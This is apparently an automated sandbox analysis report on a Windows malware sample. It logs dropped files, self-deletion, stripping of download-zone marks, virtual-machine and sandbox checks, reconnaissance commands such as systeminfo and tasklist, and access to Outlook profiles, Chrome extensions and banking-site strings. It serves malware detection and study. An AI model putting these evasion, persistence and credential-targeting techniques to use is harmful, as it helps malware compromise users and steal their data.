Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Unpacked PE file: 0.2.OCYe9qcxiM.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\hehcrfb	Unpacked PE file: 4.2.hehcrfb.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Unpacked PE file: 7.2.4470.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\fihcrfb	Unpacked PE file: 8.2.fihcrfb.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B678EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,

9_2_00007FF780B678EC

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00795033 pushfd ; iretd	0_2_00795034
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00794536 push B63524ADh; retn 001Fh	0_2_0079456D
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00796193 push esp; ret	0_2_00796195
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_02161540 pushad ; ret	0_2_02161550
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_004014D9 pushad ; ret	4_2_004014E9
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_004031DB push eax; ret	4_2_004032AB
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_005F1540 pushad ; ret	4_2_005F1550
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0063E558 pushad ; retf	4_2_0063E5CD
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0064522B push esp; ret	4_2_0064522D
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_006435CE push B63524ADh; retn 001Fh	4_2_00643605
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_006440CB pushfd ; iretd	4_2_006440CC
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_0040100B push esi; ret	7_2_0040100C
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_0040280E push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_0040281F push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_00402822 push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_00401328 push edi; retf	7_2_0040132A
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004027ED push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004027FB push esp; ret	7_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_006D1313 push edi; retf	7_2_006D1314
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_006D0FFC push esi; ret	7_2_006D0FFD
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_006D2A81 push 9A832F1Fh; iretd	7_2_006D2A87
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02161909 push esp; iretd	7_2_021619BF
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162854 push esp; ret	7_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162875 push esp; ret	7_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02161072 push esi; ret	7_2_02161073
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162862 push esp; ret	7_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02161386 push edi; retf	7_2_02161391
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162886 push esp; ret	7_2_02162A2D
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_02162889 push esp; ret	7_2_02162A2D

Source: OCYe9qcxiM.exe	Static PE information: section name: .text entropy: 7.489225566155988
Source: 4470.exe.2.dr	Static PE information: section name: .text entropy: 7.47627388301737
Source: hehcrfb.2.dr	Static PE information: section name: .text entropy: 7.489225566155988
Source: fihcrfb.2.dr	Static PE information: section name: .text entropy: 7.47627388301737

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\354F.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\4470.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fihcrfb	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hehcrfb	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\hehcrfb			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\fihcrfb			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\ocye9qcxim.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\hehcrfb:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\fihcrfb:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_14-884

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	API/Special instruction interceptor: Address: 7FFBCB7AD584
Source: C:\Users\user\AppData\Roaming\hehcrfb	API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\AppData\Roaming\hehcrfb	API/Special instruction interceptor: Address: 7FFBCB7AD584
Source: C:\Users\user\AppData\Local\Temp\4470.exe	API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\AppData\Local\Temp\4470.exe	API/Special instruction interceptor: Address: 7FFBCB7AD584
Source: C:\Users\user\AppData\Roaming\fihcrfb	API/Special instruction interceptor: Address: 7FFBCB7AE814
Source: C:\Users\user\AppData\Roaming\fihcrfb	API/Special instruction interceptor: Address: 7FFBCB7AD584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: hehcrfb, 00000004.00000002.1809416780.000000000062E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOKR
Source: 4470.exe, 00000007.00000002.2067639306.00000000006BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 14_2_00C21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,

14_2_00C21016

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 450	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1872	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 613	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1556	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 891	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 859	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 2564	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2121	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 3970	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3963

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_9-4475

Source: C:\Users\user\AppData\Roaming\fihcrfb	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Roaming\hehcrfb	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Windows\SysWOW64\explorer.exe	API coverage: 9.8 %
Source: C:\Users\user\AppData\Roaming\hehcrfb	API coverage: 1.0 %
Source: C:\Users\user\AppData\Roaming\fihcrfb	API coverage: 1.0 %

Source: C:\Windows\explorer.exe TID: 7568	Thread sleep count: 450 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7576	Thread sleep count: 1872 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7576	Thread sleep time: -187200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7572	Thread sleep count: 613 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7572	Thread sleep time: -61300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7792	Thread sleep count: 248 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7800	Thread sleep count: 210 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7796	Thread sleep count: 246 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8012	Thread sleep count: 86 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8016	Thread sleep count: 133 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8020	Thread sleep count: 135 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7576	Thread sleep count: 1556 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7576	Thread sleep time: -155600s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3684	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1988	Thread sleep count: 2564 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 1988	Thread sleep time: -2564000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7080	Thread sleep count: 2121 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7080	Thread sleep time: -2121000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6768	Thread sleep count: 3970 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6768	Thread sleep time: -3970000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7272	Thread sleep count: 3963 > 30
Source: C:\Windows\explorer.exe TID: 7272	Thread sleep time: -3963000s >= -30000s

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\354F.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00418C80 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00418EC1h	0_2_00418C80
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00418C80 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00418EC1h	4_2_00418C80
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004189C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418C01h	7_2_004189C0
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004189C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418C01h	8_2_004189C0
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00418C80 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00514d6ch], 11h and CTI: jne 00418EC1h	33_2_00418C80
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004189C0 GetSystemTimeAdjustment followed by cmp: cmp dword ptr [00513d6ch], 11h and CTI: jne 00418C01h	34_2_004189C0

Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6FB34 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,	9_2_00007FF780B6FB34
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C32B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	11_2_00C32B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C31D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	11_2_00C31D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C33ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	11_2_00C33ED9
Source: C:\Windows\explorer.exe	Code function: 13_2_00D330A8 FindFirstFileW,FindNextFileW,FindClose,	13_2_00D330A8

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 11_2_00C36512 GetSystemInfo,

11_2_00C36512

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: F1A1.tmp.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: explorer.exe, 00000002.00000000.1506409569.0000000009330000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
Source: F1A1.tmp.11.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: F1A1.tmp.11.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: F1A1.tmp.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: F1A1.tmp.11.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
